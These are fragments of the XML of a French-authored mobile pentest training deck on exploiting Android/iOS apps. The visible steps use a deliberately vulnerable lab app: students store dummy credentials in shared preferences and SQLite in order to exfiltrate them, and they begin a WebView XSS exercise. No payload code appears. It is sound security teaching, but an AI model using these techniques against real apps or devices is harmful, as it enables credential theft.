              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Data Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> first, go to the « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Data Storage menu »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83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2C302C1-F94C-EA63-7502-1A35F0669C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2309719" y="1362157"/>
            <a:ext cx="4524562" cy="4732167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2989276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dirty="0" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> section, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>let's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> do the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Go to « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> - Part 1 » and enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>mysecretuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>mypassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>tap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on "Save":</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31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3D0953-11FD-29B7-B5DE-077E540FCA38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="25206" t="16156" r="40506" b="14956"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301073" y="1482562"/>
            <a:ext cx="4009292" cy="4530946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1832747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err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> a SQLite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Go to "SQLite" and enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>mysecretuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>mypassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>tap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on « Save »:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>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485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58A4C6-A69B-45AD-56AE-CE1B05AC107D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2600820" y="1482095"/>
            <a:ext cx="4138875" cy="4602182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785580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lgn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>XSS in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Input Validation - XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>exercise</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>NOTE: If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>forget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Input Validations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Input Validations XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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4013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DF39-81F9-4623-A6F9-68E23F7D36D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Webviews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and Data Exfiltration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Fichier:Android logo 2019 (stacked).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334" y="82842"/>
            <a:ext cx="824766"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89E52E-92FC-045B-BD13-AE0302429ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2169771" y="1166446"/>
            <a:ext cx="4804457" cy="5310554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8443064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voteamAudit">
  <a:themeElements>
    <a:clrScheme name="Devoteam">
      <a:dk1>
        <a:srgbClr val="002395"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="002395"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="008566"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="18212C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="EAAB00"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="652D86"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A30050"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="2A6EBB"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="002395"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2A6EBB"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="DVU">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rgbClr val="5E6A71"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr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5E6A71"/>
          </a:solidFill>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oAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr sz="1200" dirty="0" err="1" smtClean="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:tx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DevoteamAudit.thmx</Template>
  <TotalTime>31495</TotalTime>
  <Words>10831</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1444</Paragraphs>
  <Slides>194</Slides>
  <Notes>122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194</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="207" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>OpenSans-Regular</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>UbuntuMono-Bold</vt:lpstr>
      <vt:lpstr>UbuntuMono-Regular</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>DevoteamAudit</vt:lpstr>
      <vt:lpstr>think-cell Slide</vt:lpstr>
      <vt:lpstr> Bootcamp D : Exploiting real-world issues on Android/iOS applications</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>About this Bootcamp</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Mobile Security Introduction</vt:lpstr>
      <vt:lpstr>Mobile Security Introduction</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</vt:lpstr>
      <vt:lpstr>Pentest Lab setup</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vt:lpstr>
      <vt:lpstr>Pentest tools Tools</vt:lpstr>
      <vt:lpstr>Pentest tools</vt:lpstr>
      <vt:lpstr>Pentest tools</vt:lpstr>
      <vt:lpstr>Pentest tools</vt:lpstr>
      <vt:lpstr>Summary</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Labs</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Further readings </vt:lpstr>
      <vt:lpstr>Further readings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Sécurité Informatique</dc:title>
  <dc:creator>Gregory Charbonneau</dc:creator>
  <cp:lastModifiedBy>Abdessamad Temmar</cp:lastModifiedBy>
  <cp:revision>752</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-25T14:33:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-07T07:30:37Z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870819005</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_NewReviewCycle">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_EmailSubject">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_AuthorEmail">
    <vt:lpwstr>abdessamad.temmar-ext@amundi.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_AuthorEmailDisplayName">
    <vt:lpwstr>Temmar Abdessamad (AMUNDI-ITS)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="_PreviousAdHocReviewCycleID">
    <vt:i4>-1280953032</vt:i4>
  </property>
</Properties>
</file>